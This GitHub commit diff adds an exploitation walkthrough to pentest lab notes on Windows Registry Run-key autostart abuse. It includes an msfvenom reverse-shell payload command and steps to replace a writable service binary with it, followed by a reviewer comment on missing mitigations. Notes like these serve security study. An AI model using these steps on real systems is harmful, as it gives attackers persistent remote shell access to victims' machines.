Edit Logon Autostart Execution (Registry Run Keys)
nickvourd committed Dec 20, 2023
1 parent 9536a60 commit 93d010c
Showing 2 changed files with 20 additions and 0 deletions.
20 changes: 20 additions & 0 deletions Notes/LogonAutostartExecutionRegistryRunKeys.md
Expand Up @@ -99,6 +99,26 @@ Outcome:

## Exploitation

1) Use msfvenom to generate a malicious executable (exe) file that can be executed via the booting of the victim's machine:

```
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe
```

2) Transfer the malicious executable file to victim's machine.

3) Move the malicious executable file to 'C:\Program Files\NickvourdSrv'.

4) Rename the 'NCV_AMD64.exe' to 'NCV_AMD64.bak'.

5) Rename the malicious exe (shell.exe) to 'NCV_AMD64.exe'.

Outcome:

![RegistryAutoruns-AboveActions](/Pictures/RegistryAutoruns-AboveActions.png)

6) Open a listener on your Kali machine.

## Mitigation

## References
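
Review bot: The Mitigation heading that directly follows step 6 has no content in the visible lines, so the note walks through replacing the binary in 'C:\Program Files\NickvourdSrv' without saying how to prevent or detect it. Steps 3 to 5 depend on the account being able to write to and rename files in that directory, so the section should at least cover restricting the directory ACL so that only administrators can modify it, and alerting when 'NCV_AMD64.exe' is renamed or replaced. Separately, step 1 says the file runs "via the booting of the victim's machine", while the page title is Logon Autostart Execution; Run-key entries start when a user logs on, so "at the next user logon" would be accurate. The code fence in step 1 also has no language tag.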
Binary file added Pictures/RegistryAutoruns-AboveActions.png